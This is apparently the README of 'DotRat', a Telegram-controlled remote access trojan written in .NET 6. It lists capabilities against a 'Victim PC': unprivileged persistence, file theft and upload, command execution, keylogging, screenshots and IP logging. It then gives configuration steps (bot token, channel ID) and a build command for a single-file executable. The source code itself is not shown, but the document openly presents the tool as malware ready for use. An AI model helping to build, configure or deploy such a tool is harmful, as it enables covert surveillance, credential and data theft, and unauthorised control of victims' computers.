DotRat is a telegram rat, which incorporates features to establish easy, simple and secure control over a computer. Developed on .net6
🔐 DotRat includes a persistence without priveleges so that the program runs in the background without needing to be run again when the pc is restarted and has permanent access to the system.
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- 🔐 Persistence on the system
- 📩 Download a file from the PC
- 📁 Displays the directories within a path
- 📖 Reads the contents of a file
- 🛣️ Configures the path where files uploaded from Telegram will be saved
- 🗄️ Upload your documents to the PC via Telegram Upload.
- 💻 Execute commands on the Victim PC.
- 🌍 IP registration
- Log keystrokes
- Take screenshots
- Visual Studio 2022
- .net6
- Create a Telegram Bot with
To configure the program for your needs, you must enter the following lines in the Program.cs file in the code and the following lines in the Program.cs file
- Line 71: BotToken
- Line 72: Channel ChatId
- Line 109: Channel ChatId same as line 72 without double quotes
To create the executable u need to generate a uniq .exe on the terminal of the vs. If you dont do that the persistence doesn't work.
dotnet publish -r win-x64 /p:PublishSingleFile=true /p:IncludeNativeLibrariesForSelfExtract=true --output "C:\Users\{user}\Desktop\{folder}\"